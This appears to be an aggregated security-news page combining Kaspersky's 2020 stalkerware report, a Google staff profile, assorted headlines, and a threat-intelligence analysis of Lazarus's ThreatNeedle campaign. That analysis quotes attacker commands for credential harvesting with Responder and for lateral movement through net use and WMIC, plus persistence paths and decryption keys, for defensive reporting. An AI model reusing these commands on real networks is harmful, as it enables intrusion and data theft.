Kategorie

Cisco has addressed a maximum severity vulnerability in its Application Centric Infrastructure (ACI) Multi-Site Orchestrator (MSO) that could allow an unauthenticated, remote attacker to bypass authentication on vulnerable devices. "An attacker could exploit this vulnerability by sending a crafted request to the affected API," the company said in an advisory published yesterday. "A successful

 The state of stalkerware in 2020 (PDF)

Main findings

Kaspersky’s data shows that the scale of the stalkerware issue has not improved much in 2020 compared to the last year:

• The number of people affected is still high. In total, 53,870 of our mobile users were affected globally by stalkerware in 2020. Keeping in mind the big picture, these numbers only include Kaspersky users, and the total global numbers will be higher. Some affected users may use another cybersecurity solution on their devices, while some do not use any solution at all.
• With more than 8,100 users affected globally, Nidb is the most used stalkerware sample, according to our 2020 stats. This sample is used to sell a number of different stalkerware products such as iSpyoo, TheTruthSpy and Copy9 among others.
• In terms of geographic spread, we see a largely consistent trend emerging: Russia, Brazil, and the United States of America (USA) remain the most affected countries globally, and they are the three leading countries in 2020.
• In Europe, Germany, Italy and the United Kingdom (UK) are the top three most-affected countries respectively.

Introduction and methodology

Technology has enabled people to connect more than ever before. We can choose to digitally share our lives with our partner, family, and friends regardless of how far we are physically. Yet, we are also seeing a rise in software that enables users to remotely spy on another person’s life via their digital device, without the affected user giving their consent or being notified.

The software, known as stalkerware, is commercially available to everyone with access to the internet. The risks of stalkerware can go beyond the online sphere and enter the physical world. The Coalition Against Stalkerware warns that stalkerware “may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence.” Stalkerware can also operate in stealth mode, meaning that there is no icon displayed on the device to indicate its presence and it is not visible to the affected user. The majority of affected users do not even know this type of software exists. This means they cannot protect themselves, online or offline, especially as the perpetrator using stalkerware usually knows their victim personally.

In recent years, Kaspersky has been actively working with partners to end the use of stalkerware. In 2019, we created a special alert that notifies users if stalkerware is installed on their phones. Following that we became one of ten founding members of the Coalition Against Stalkerware. We also published our first full report on the state of stalkerware in the same year to understand the scale of the problem.

This report continues to examine the issue of stalkerware and presents new statistics from 2020, in comparison to our previous data. The data in this report has been taken from aggregated threat statistics obtained from the Kaspersky Security Network. The Kaspersky Security Network is dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world. All received data is anonymized. To calculate our statistics, we review the consumer line of Kaspersky’s mobile security solutions.

The issue of, and the story behind, stalkerware

Stalkerware is software that is commercially available to everyone with access to the internet. It is used to spy remotely on another person via their device, without the affected user giving their consent or being notified. Stalkerware operates in stealth mode, meaning that there is no icon displayed on the device indicating its presence, and it is not visible to the affected user. Therefore, the Coalition Against Stalkerware defines stalkerware as software which “may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence”.

The dimension of cyberviolence

According to a report by the European Institute for Gender Equality, “seven in ten women in Europe who have experienced cyberstalking have also experience at least one form of physical and/or sexual violence from an intimate partner”. Echoing these findings, experts from non-profit organizations (NPOs) that help domestic abuse survivors and victims emphasize that cyberstalking is also a form of violence. Just as with physical, psychological, and economic violence, an abuser can use surveillance to obtain complete control of their victim/survivor[1] and stay in charge of the situation.

Using stalkerware, the extent of control held by the abuser can be immense. Depending on the type installed, stalkerware may have a variety of functions to intrude into the victim’s privacy. With the software’s help, an abuser can:

• Read anything the surveilled person types – logging each keystroke on the device, including credentials to any kind of services such as banking applications, online shops and social networks, etc.
• Know where they are – by tracking a person’s movements with GPS, in real time
• Hear what they say – eavesdrop on calls, or even record them
• Read messages on any messenger, regardless of whether encryption is used
• Monitor social network activity
• See photos and videos
• Switch on the camera

All of this private information can be collected, usually from a mobile device, such as a tablet or a smartphone.

Non-profit organizations from the Coalition Against Stalkerware are experiencing a growing number of survivors seeking help with the problem:

• Findings from the Second National Survey on technology abuse and domestic violence in Australia, launched by WESNET with the assistance of Dr. Delanie Woodlock and researchers from Curtin University, state that 99.3% of domestic violence practitioners have clients experiencing technology-facilitated abuse and that the use of video cameras increased by 183.2% between 2015 and 2020.
• According to a study on cyberviolence in intimate relationships, conducted by the Centre Hubertine Auclert in France, 21% of victims have experienced stalkerware at the hands of their abusive partner, and 69% of victims have the feeling that the personal information on their smartphone has been accessed by their partner in a hidden way.
• In Germany, for several years, Women’s Counselling Centers and Rape Crisis Centers (bff) have noticed an increasing use of stalkerware in conjunction with partner relationships.
• In the USA, stalking impacts an estimated 6-7.5 million people over a one-year period, and one-in-four victims report being stalked through some form of technology, according to the Stalking Prevention Awareness & Resource Center (SPARC).

Physical access is the key

Unfortunately, it is not too difficult to secretly install stalkerware on a victim’s phone. The main barrier that exists is that stalkerware has to be configured on an affected device. Due to the distribution vector of such applications which are very different from common malware distribution schemes, it is impossible to get infected with a stalkerware through a spam message including a link to stalkerware or a trap via normal web surfing.

This means that the abuser will need to have physical access to the target device in order to install stalkerware. This is possible if the device either has no pin, pattern, or password to protect it or alternatively, the abuser knows the victim/survivor personally. Installation on the target device can be completed within a few minutes.

Prior to accessing the survivor’s device, the abuser has to collect a link to the installation package from the stalkerware developer’s webpage. In most cases, the software is not downloaded from an official application store. For Android devices, Google banned applications that are clearly stalkerware from its Google Play application store in 2020. This means the abuser will not be able to install such an application from the general app store. Instead, the abuser must follow several steps before being able to install stalkerware. As a result, the abuser may leave traces in the device settings that a user can check if they are concerned they may be being spied on.

Stalkerware tools are less frequent on iPhones than on Android devices because iOS is traditionally a closed system. However, perpetrators can work around this limitation on jailbroken iPhones. They still need physical access to the phone to jailbreak it, so iPhone users who fear surveillance should always keep an eye on their device. Alternatively, an abuser can offer their victim an iPhone – or any other device – with pre-installed stalkerware as a gift. There are many companies who make their services available online to install such tools on a new phone and deliver it to an unwitting addressee in factory packaging to celebrate a special occasion.

The risk of privacy leaks

The information monitored via stalkerware will be available to at least one person – the abuser who installed stalkerware on the survivor’s phone. However, sometimes it is possible that all the private data may become publically available. Year on year, stalkerware servers are either hacked or left openly unprotected so that information can be accessed and leaked online. For example, in 2020, such a data breach occurred due to a product provided by ClevGuard. In previous years, we have seen similar incidents with Mobiispy in 2019 and with MSpy in 2018 and 2015.

These are just a few examples of a long list in which databases from companies developing stalkerware have been exposed, affecting millions of user accounts. With the possibility to track a person’s location, it means that not only their cyberprivacy is lost but also their security in the physical world may be at risk.

The legal status

Stalkerware applications are sold and provided by companies under various facades, such as child monitoring or employee tracking solutions. While laws vary from one country and state to another, they are catching up. Generally speaking, it is only illegal to use such tools and apps that record user activity without their consent or that of legal authority. Slowly we are seeing some shifts in legislation. For instance, in 2020, France reinforced sanctions on secret surveillance: geolocating someone without their consent is now punishable with one year imprisonment and a fine of 45,000 euros. If this is done within a couple, the sanctions are potentially higher, including two years’ imprisonment and a fine of 60,000 euros.

Stalkerware tools often violate laws and expose the stalker to legal liability for any recordings made without the victim’s knowledge. Stalkers must realize that they are breaking the law. If the use of stalkerware is reported, the punishment applies to the private perpetrator who installed the software – not its vendor. In the USA, only two stalking app developers have been fined in recent history. One had to pay a record 500,000 US dollar fine, which put an end to the app development process, while the other got off with an order to change the app’s functionality for future sales.

The scale of the issue Global detection figures – affected users

In this section, we look at the global numbers of unique users whose mobile device was found to have stalkerware detected.

The 2020 data shows that the stalkerware situation has not improved much: the number of affected people is still high. A total of 53,870 unique users were affected globally by stalkerware in 2020. Whereas in 2019, 66,927 unique users were affected globally. However, the fact must be taken into account that 2020 was an unprecedented year in which lives have changed in a dramatic way across the globe.

To fight the COVID-19 pandemic, all countries in the world have faced massive restrictions such as self-isolation measures or lockdowns in order to make people stay at home. Considering that stalkerware is used as another tool to control an intimate partner who the abuser lives with as they go about their day-to-day life, this can explain the somewhat lower numbers in comparison with the previous year.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Unique users affected by stalkerware globally from 2018 until 2020 – total per year (download)

When looking at the figures of the total number of unique users affected by stalkerware in 2020 worldwide per month, this trend becomes even more noticeable. The first two months of the year were stable with many cases of affected devices arising, showing stalkerware was quite popular. The situation changed in March when many countries decided to announce quarantine measures. The curve shows a trend that the numbers began to stabilize as of June 2020 when many countries around the world eased restrictions.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Unique users affected by stalkerware in 2020 worldwide – total by month (download)

That said, the 2020 numbers are still on a high, stable level. In comparison, in 2018, there were 40,173 detections of unique users being affected globally by stalkerware. This brings into perspective the total numbers from 2020, as we have seen a growing integration of technology into our lives. Sadly, this also means the software used for stalking is becoming more common as another form of intimate partner violence.

Global detection figures – stalkerware samples

In this section, we analyze which stalkerware samples are actually the most used to control mobile devices on a global level. In 2020 the most detected samples can be seen in the following results.

Top 10 most detected stalkerware samples globally

  Samples Affected users 1 Monitor.AndroidOS.Nidb.a 8147 2 Monitor.AndroidOS.Cerberus.a 5429 3 Monitor.AndroidOS.Agent.af 2727 4 Monitor.AndroidOS.Anlost.a 2234 5 Monitor.AndroidOS.MobileTracker.c 2161 6 Monitor.AndroidOS.PhoneSpy.b 1774 7 Monitor.AndroidOS.Agent.hb 1463 8 Monitor.AndroidOS.Cerberus.b 1310 9 Monitor.AndroidOS.Reptilic.a 1302 10 Monitor.AndroidOS.SecretCam.a 1124

1. With more than 8,100 users having been affected by it, Nidb was the most used stalkerware sample in 2020. The Nidb creator sells their product as Stalkerware as a Service. This means that anyone could rent their control server software and mobile application, rename it to any suitable marketing name and sell it separately—examples of this include iSpyoo, TheTruthSpy, Copy9, and others.
2. Both second and eighth place are occupied by Cerberus. These are two different samples under the same family. Variant Cerberus.a affected more than 5,400 users.
3. Agent.af comes in third place, with more than 2,700 users having been affected. This is marketed as Track My Phone and has typical features such as reading messages from any messenger, logging a person’s call history, and tracking geolocation.
4. Anlost.a is a good example of stalkerware in disguise. It is advertised as an antitheft application, and its icon is present on the home screen (not usual behavior for stealthy stalkerware apps). Therefore, it is available on the Google Play Store. That said, it is possible to deliberately hide the icon from the home screen. One of the key functionalities of the application is to intercept SMS messages and read the call log. More than 2,200 users having been affected by this sample.
5. MobileTracker.c has several functionalities such as intercepting messages from popular social networks and taking remote control of the affected device. More than 2,100 users having been affected by this sample.
6. PhoneSpy is also known as Spy Phone app or Spapp Monitoring. This application consists of many spy features, covering all popular instant messengers and social networks.
7. Agent.hb is another version of MobileTracker. Like the original version, it offers many functionalities.
8. Cerberus.b, a different sample from the same family as Cerberus.a.
9. Reptilic.a is stalkerware that includes many features such as social media monitoring, call recordings, and browser history monitoring.
10. SecretCam.a is camera stalking software, meaning it is able to secretly record video from the front or back camera of the affected device.

Geography of affected users

Stalkerware is a global phenomenon that affects countries regardless of size, society, or culture. When looking at the top 10 affected countries worldwide in 2020, Kaspersky’s findings show that largely the same countries remain the most affected, with Russia in the number one spot. Yet, we see an increase in stalkerware activity in Brazil and the USA in 2020 compared to 2019. However, we detected fewer incidents in India, which has fallen in the rankings. We have also detected a higher number of incidents in Mexico, which has risen in the ranking two places.

Top 10 most affected countries by stalkerware – globally

  Country Affected users 1 Russian Federation 12389 2 Brazil 6523 3 United States of America 4745 4 India 4627 5 Mexico 1570 6 Germany 1547 7 Iran 1345 8 Italy 1144 9 United Kingdom 1009 10 Saudi Arabia 968

When considering Europe, Germany, Italy and the UK are the three most affected countries, in that order. They are followed by France in fourth place and Spain in fifth place.

Top 10 most affected countries by stalkerware – Europe

  Country Affected users 1 Germany 1547 2 Italy 1144 3 United Kingdom 1009 4 France 904 5 Spain 873 6 Poland 444 7 Netherlands 321 8 Romania 222 9 Belgium 180 10 Austria 153 How to check if a mobile device has stalkerware installed

It’s hard for everyday users to know if stalkerware is installed on their devices. Generally, this type of software remains hidden which includes hiding the icon of the stalkerware app on the home screen and in the phone menu and even cleaning any traces that have been made. However, it may give itself away and there are some warning signs. Among the most important are:

• Keep an eye out for a fast draining battery, constant overheating and mobile data traffic growth.
• Do regular antivirus scanning on your Android device: If the cybersecurity solution detected stalkerware, do not rush to remove it as the abuser may notice. Have a safety plan in place and reach out to a local help organization.
• Check browser history: To download stalkerware, the abuser will have to visit some web pages, the affected user does not know about. Alternatively, there could be no history at all if abuse wiped it out.
• Check “unknown sources” settings: If “unknown sources” are enabled on your device, it might be a sign that unwanted software were installed from third-party source.
• Check permissions of installed apps: Stalkerware application may be disguised under a wrong name with suspicious access to messages, call logs, location, and other personal activity.

However, it’s also important to understand that warning signs or symptoms are not necessarily proof that stalkerware is installed on a device.

How to minimize the risk

There are a few pieces of advice that can help to increase your digital safety:

• Never lend your phone to anyone without seeing what happens with the phone and not leave it unlocked.*
• Use a complex lock screen password and change passwords on a regular basis.
• Do not disclose your password to anyone – not even your intimate partner or family members or close friends.*
• Do regular checks of your phone— delete apps you don’t use and review the permissions granted to each app.
• Disable the option of third-party application installation on Android devices.
• Protect your Android devices with a cyber-security solution, such as Kaspersky Internet Security for Android (for free), which detects stalkerware and issues warnings.

*In the context of domestic violence and abusive relationships it may be difficult or even impossible to deny the abusive partner access to the phone.

Kaspersky’s activities and contribution to end cyberviolence

Kaspersky is actively working to end the use of cyberviolence and stalkerware, as a company, and together with many other partners. In 2019, we created a special alert that notifies users when stalkerware is installed on their phones. In the same year, with nine other founding members we created the Coalition Against Stalkerware. In 2020, we created TinyCheck, a free tool to detect stalkerware on mobile devices – specifically for service organizations working with victims of domestic violence. TinyCheck can be found on https://github.com/KasperskyLab/TinyCheck. Since 2021, we are one of five partners in an EU-wide project aimed at tackling gender-based cyberviolence and stalkerware called DeStalk, which the European Commission chose to support with its Rights, Equality and Citizenship Program.

About the Coalition Against Stalkerware

The Coalition Against Stalkerware (“CAS” or “Coalition”) is a group dedicated to addressing abuse, stalking, and harassment via the creation and use of stalkerware. Launched in November 2019, the Coalition Against Stalkerware gained 26 partners in its first year. These include founding partners – Avira, Electronic Frontier Foundation, the European Network for the Work with Perpetrators of Domestic Violence, G DATA Cyber Defense, Kaspersky, Malwarebytes, The National Network to End Domestic Violence, NortonLifeLock, Operation Safe Escape, and WEISSER RING. The Coalition looks to bring together a diverse array of organizations to actively address the criminal behavior perpetrated through stalkerware and increase public awareness about this important issue. Due to the high societal relevance for users all over the globe and new variants of stalkerware emerging periodically, the Coalition Against Stalkerware is open to new partners and calls for cooperation. To find out more about the Coalition Against Stalkerware please visit the official website www.stopstalkerware.org

[1] Experts refer in their terminology more and more to the empowering term survivor instead of victim. Hence, in this report, we will use both terms.

Cybersecurity researchers today unwrapped a new campaign aimed at spying on vulnerable Tibetan communities globally by deploying a malicious Firefox extension on target systems. "Threat actors aligned with the Chinese Communist Party's state interests delivered a customized malicious Mozilla Firefox browser extension that facilitated access and control of users' Gmail accounts," Proofpoint said

On August 13, 2016, a hacking unit calling itself "The Shadow Brokers" announced that it had stolen malware tools and exploits used by the Equation Group, a sophisticated threat actor believed to be affiliated to the Tailored Access Operations (TAO) unit of the U.S. National Security Agency (NSA). Although the group has since signed off following the unprecedented disclosures, new "conclusive"

Biologická laboratoř Oxfordské univerzity, kde se prováděl výzkum nemoci covid-19, se stala terčem kybernetického útoku. Panují obavy, že se skupina hackerů pokusí prodat výsledky výzkumu zájemci, který nabídne nejvyšší cenu. Informoval o tom ve čtvrtek deník The Telegraph.

Posted by Royal Hansen, Vice President, Security

Black History Month may be coming to a close, but our work to build sustainable equity for Google’s Black+ community, and externally is ongoing. Currently, Black Americans make up less than 12% of information security analysts in the U.S. In an industry that consistently requires new ideas to spark positive change and stand out against the status quo, it is necessary to have individuals who think, speak, and act in diverse ways. Diverse security teams are more innovative, produce better products and enhance an organization's ability to defend against cyber threats.

In an effort to amplify the contributions of the Black+ community to security and privacy fields, we’ll be sharing profiles of Black+ Googlers working on innovative privacy and security solutions over the coming weeks, starting with Camille Stewart, Google’s Head of Security Policy for Google Play and Android.

Camille co-founded #ShareTheMicInCyber, an initiative that pairs Black security practitioners with prominent allies, lending their social media platforms to the practitioners for the day. The goal is to break down barriers, engage the security community, and promote sustained action. The #ShareTheMicInCyber campaign will highlight Black women in the security and privacy sector on LinkedIn and Twitter on March 19, 2021 and throughout March 2021 in celebration of Women's History Month. Follow the #ShareTheMicInCyber on March 19th to support and amplify Black women in security and privacy.

Read more about Camille’s story below ↓

#ShareTheMicInCyber: Camille Stewart

Today, we will hear from Camille Stewart, she leads security, privacy, election integrity, and dis/misinformation policy efforts for Google's mobile business. She also spearheads a cross-Google security initiative that sets the strategic vision and objectives for Google’s engagement on security and privacy issues.

In her (not so) spare time, Camille is co-founder of the #ShareTheMicInCyber initiative – which aims to elevate the profiles, work, and lived experiences of Black cyber practitioners. This initiative has garnered national and international attention and has been a force for educating and bringing awareness to the challenges Black security practitioners face in industry. Camille is also a cybersecurity fellow at Harvard University, New America and Truman National Security Project. She sits on the board of the International Foundation for Electoral Systems and of Girl Security, an organization that is working to close the gender gap in national security through learning, training, and mentoring support for girls.





Why do you work in security or privacy?

I work in this space to empower people in and through technology by translating and solving the complex challenges that lie at the intersection of technology, security, society, and the law.

Tell us a little bit about your career journey to Google

Before life at Google, I managed cybersecurity, election security, tech innovation, and risk issues at Deloitte. Prior to that, I was appointed by President Barack Obama to be the Senior Policy Advisor for Cyber Infrastructure & Resilience Policy at the Department of Homeland Security. I was the Senior Manager of Legal Affairs at Cyveillance, a cybersecurity company after working on Capitol Hill.

What is your security or privacy "soapbox"?

Right now, I have a few. Users being intentional about their digital security similar to their physical security especially with their mobile devices and apps. As creators of technology, we need to be more intentional about how we educate our users on safety and security. At Google, security is core to everything we do and build, it has to be. We recently launched our Safer With Google campaign which I believe is a great resource for helping users better understand their security and privacy journey.

As an industry, we need to make meaningful national and international progress on digital supply chain transparency and security.

Lastly, the fact that systemic racism is a cybersecurity threat. I recently penned a piece for the Council on Foreign Relations that explores how racism influences cybersecurity and what we must do as an industry to address it.

If you are interested in following Camille’s work here at Google and beyond, please follow her on Twitter @CamilleEsq. We will be bringing you more profiles over the coming weeks and we hope you will engage with and share these with your network. 
If you are interested in participating or learning more about #ShareTheMicInCyber, click here.

Vietnam joins the ranks of governments using spyware to crack down on human-rights defenders.

A teenaged ethical hacker discovered a flawed endpoint associated with a health-department website in the state of Bengal, which exposed personally identifiable information related to test results.

The malicious extension, FriarFox, snoops in on both Firefox and Gmail-related data.

Ukraine is formally pointing fingers at Russian hackers for hacking into one of its government systems and attempting to plant and distribute malicious documents that would install malware on target systems of public authorities. "The purpose of the attack was the mass contamination of information resources of public authorities, as this system is used for the circulation of documents in most

Cisco also stomped out a critical security flaw affecting its Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches.

As part of an effort to advance Linux security, Sysdig has donated a sysdig kernel module, along with libraries for the Falco security platform for Kubernetes, to the Cloud Native Computing Foundation (CNCF).

Google has demonstrated serious concern about the security of Linux and open-source code, and is sponsoring a pair of full-time developers to work on the kernel's security.

Za nedávnou vlnou kybernetických útoků na francouzské nemocnice stojí mafiánské organizace, jež často pocházejí z východní Evropy, a nikoliv aktéři napojení na cizí státy. Podle agentury Reuters to ve čtvrtek prohlásil francouzský ministr pro digitální technologie Cedric O.

It's no secret that sysadmins have plenty on their plates. Managing, troubleshooting, and updating software or hardware is a tedious task. Additionally, admins must grapple with complex webs of permissions and security. This can quickly become overwhelming without the right tools. If you're a sysadmin seeking to simplify your workflows, you're in luck. We've gathered some excellent software

Latest episode - listen now!

Lazarus targets defense industry with ThreatNeedle (PDF)

We named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. After taking a closer look, we identified the malware used in those attacks as belonging to a family that we call ThreatNeedle. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns.

The group made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered using publicly available sources. After gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim environment. We observed how they overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the intranet network to their remote server. So far organizations in more than a dozen countries have been affected.

During this investigation we had a chance to look into the command-and-control infrastructure. The attackers configured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns.

The full article is available on Kaspersky Threat Intelligence.
For more information please contact: ics-cert@kaspersky.com

Initial infection

In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company.

Email addresses in those departments received phishing emails that either had a malicious Word document attached or a link to one hosted on a remote server. The phishing emails claimed to have urgent updates on today’s hottest topic – COVID-19 infections. The phishing emails were carefully crafted and written on behalf of a medical center that is part of the organization under attack.

Phishing email with links to malicious documents

The attackers registered accounts with a public email service, making sure the sender’s email addresses looked similar to the medical center’s real email address. The signature shown in the phishing emails included the actual personal data of the deputy head doctor of the attacked organization’s medical center. The attackers were able to find this information on the medical center’s public website.

A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system.

The document contains information on the population health assessment program and is not directly related to the subject of the phishing email (COVID-19), suggesting the attackers may not completely understand the meaning of the contents they used.

Contents of malicious document

The content of the lure document was copied from an online post by a health clinic.

Our investigation showed that the initial spear-phishing attempt was unsuccessful due to macros being disabled in the Microsoft Office installation of the targeted systems. In order to persuade the target to allow the malicious macro, the attacker sent another email showing how to enable macros in Microsoft Office.

Email with instructions on enabling macros #1

After sending the above email with explanations, the attackers realized that the target was using a different version of Microsoft Office and therefore required a different procedure for enabling macros. The attackers subsequently sent another email showing the correct procedure in a screenshot with a Russian language pack.

Email with instructions on enabling macros #2

The content in the spear-phishing emails sent by the attackers from May 21 to May 26, 2020, did not contain any grammatical mistakes. However, in subsequent emails the attackers made numerous errors, suggesting they may not be native Russian speakers and were using translation tools.

Email containing several grammatical mistakes

On June 3, 2020, one of the malicious attachments was opened by employees and at 9:30 am local time the attackers gained remote control of the infected system.

This group also utilized different types of spear-phishing attack. One of the compromised hosts received several spear-phishing documents on May 19, 2020. The malicious file that was delivered, named Boeing_AERO_GS.docx, fetches a template from a remote server.

However, no payload created by this malicious document could be discovered. We speculate that the infection from this malicious document failed for a reason unknown to us. A few days later, the same host opened a different malicious document. The threat actor wiped these files from disk after the initial infection meaning they could not be obtained.

Nonetheless, a related malicious document with this malware was retrieved based on our telemetry. It creates a payload and shortcut file and then continues executing the payload by using the following command line parameters.

• Payload path: %APPDATA%\Microsoft\Windows\lconcaches.db
• Shortcut path: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk
• Command Line; please note that the string at the end is hard-coded, but different for each sample:
• exe [dllpath],Dispatch n2UmQ9McxUds2b29

The content of the decoy document depicts the job description of a generator/power industry engineer.

Decoy document

Malware implants

Upon opening a malicious document and allowing the macro, the malware is dropped and proceeds to a multistage deployment procedure. The malware used in this campaign belongs to a known malware cluster we named ThreatNeedle. We attribute this malware family to the advanced version of Manuscrypt (a.k.a. NukeSped), a family belonging to the Lazarus group. We previously observed the Lazarus group utilizing this cluster when attacking cryptocurrency businesses and a mobile game company. Although the malware involved and the entire infection process is known and has not changed dramatically compared to previous findings, the Lazarus group continued using ThreatNeedle malware aggressively in this campaign.

Infection procedure

The payload created by the initial spear-phishing document loads the next stage as a backdoor running in-memory – the ThreatNeedle backdoor. ThreatNeedle offers functionality to control infected victims. The actor uses it to carry out initial reconnaissance and deploy additional malware for lateral movement. When moving laterally, the actor uses ThreatNeedle installer-type malware in the process. This installer is responsible for implanting the next stage loader-type malware and registering it for auto-execution in order to achieve persistence. The ThreatNeedle loader-type malware exists in several variations and serves the primary purpose of loading the final stage of the ThreatNeedle malware in-memory.

ThreatNeedle installer

Upon launch, the malware decrypts an embedded string using RC4 (key: B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4) and compares it to “7486513879852“. If the user executes this malware without a command line parameter, the malware launches a legitimate calculator carrying a dark icon of the popular Avengers franchise.

Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We’ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened.

It then decrypts the embedded payload using the RC4 algorithm, saves it to an .xml extension with a randomly created five-character file name in the current directory and then copies it to the system folder with a .sys extension.

This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched. In addition, the malware saves the configuration data as a registry key encrypted in RC4:

• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description

ThreatNeedle loader

This component is responsible for loading the final backdoor payload into memory. In order to do this, the malware uses several techniques to decrypt its payload:

• Loading the payload from the registry.
• Loading the payload from itself after decrypting RC4 and decompression.
• Loading the payload from itself after decrypting AES and decompression.
• Loading the payload from itself after decompression.
• Loading the payload from itself after one-byte XORing.

Most loader-style malware types check the command line parameter and only proceed with the malicious routine if an expected parameter is given. This is a common trait in ThreatNeedle loaders. The most common example we’ve seen is similar to the ThreatNeedle installer – the malware decrypts an embedded string using RC4, and compares it with the parameter “Sx6BrUk4v4rqBFBV” upon launch. If it matches, the malware begins decrypting its embedded payload using the same RC4 key. The decrypted payload is an archive file which is subsequently decompressed in the process. Eventually, the ThreatNeedle malware spawns in memory.

The other variant of the loader is preparing the next stage payload from the victim’s registry. As we can see from the installer malware description, we suspect that the registry key was created by the installer component. Retrieved data from the registry is decrypted using RC4 and then decompressed. Eventually, it gets loaded into memory and the export function is invoked.

ThreatNeedle backdoor

The final payload executed in memory is the actual ThreatNeedle backdoor. It has the following functionality to control infected victim machines:

• Manipulate files/directories
• System profiling
• Control backdoor processes
• Enter sleeping or hibernation mode
• Update backdoor configuration
• Execute received commands

Post-exploitation phase

From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under “Overcoming network segmentation“.

Judging by the hosts that were infected with the ThreatNeedle backdoors post-exploitation, we speculate that the primary intention of this attack is to steal intellectual property. Lastly, the stolen data gets exfiltrated using a custom tool that will be described in the “Exfiltration” section. Below is a rough timeline of the compromise we investigated:

Timeline of infected hosts

Credential gathering

During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. One day after the initial infection, the malware operator placed the tool onto this host and executed it using the following command:

• [Responder file path] -i [IP address] -rPv

Several days later, the attacker started to move laterally originating from this host. Therefore, we assess that the attacker succeeded in acquiring login credentials from this host and started using them for further malicious activity.

Lateral movement

After acquiring the login credentials, the actor started to move laterally from workstations to server hosts. Typical lateral movement methods were employed, using Windows commands. First, a network connection with a remote host was established using the command “net use”.

• net use \\[IP address]\IPC$ “[password]” /u:”[user name]” > $temp\~tmp5936t.tmp 2>&1″

Next, the actor copied malware to the remote host using the Windows Management Instrumentation Command-line (WMIC).

• exe /node:[IP address] /user:”[user name]” /password:”[password]” PROCESS CALL CREATE “cmd.exe /c $appdata\Adobe\adobe.bat“
• exe /node:[IP address] /user:”[user name]” /password:”[password]” PROCESS CALL CREATE “cmd /c sc queryex helpsvc > $temp\tmp001.dat“

Overcoming network segmentation

In the course of this research, we identified another highly interesting technique used by the attackers for lateral movement and exfiltration of stolen data. The enterprise network under attack was divided into two segments: corporate (a network on which computers had internet access) and restricted (a network on which computers hosted sensitive data and had no internet access). According to corporate policies, no transfer of information was allowed between these two segments. In other words, the two segments were meant to be completely separated.

Initially, the attackers were able to get access to systems with internet access and spent a long time distributing malware between machines in the network’s corporate segment. Among the compromised machines were those used by the administrators of the enterprise’s IT infrastructure.

It is worth noting that the administrators could connect both to the corporate and the restricted network segments to maintain systems and provide users with technical support in both zones. As a result, by gaining control of administrator workstations the attackers were able to access the restricted network segment.

However, since directly routing traffic between the segments was not possible, the attackers couldn’t use their standard malware set to exfiltrate data from the restricted segment to the C2.

The situation changed on July 2 when the attackers managed to obtain the credentials for the router used by the administrators to connect to systems in both segments. The router was a virtual machine running CentOS to route traffic between several network interfaces based on predefined rules.

Connection layout between victim’s network segments

According to the evidence collected, the attackers scanned the router’s ports and detected a Webmin interface. Next, the attackers logged in to the web interface using a privileged root account. It’s unknown how the attackers were able to obtain the credentials for that account, but it’s possible the credentials were saved in one of the infected system’s browser password managers.

Log listing Webmin web interface logins

By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization’s corporate and restricted segments.

List of services used on the router

Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy PSCP (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network’s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router.

New connection layout after attacker’s intrusion

In the course of the investigation we identified malware samples with the hardcoded URL of the router used as a proxy server.

Hardcoded proxy address in the malware

Since the attackers regularly deleted log files from the router, only a handful of commands entered to the command line via SSH could be recovered. An analysis of these commands shows that the attackers tried to reconfigure traffic routing using the route command.

Attacker commands

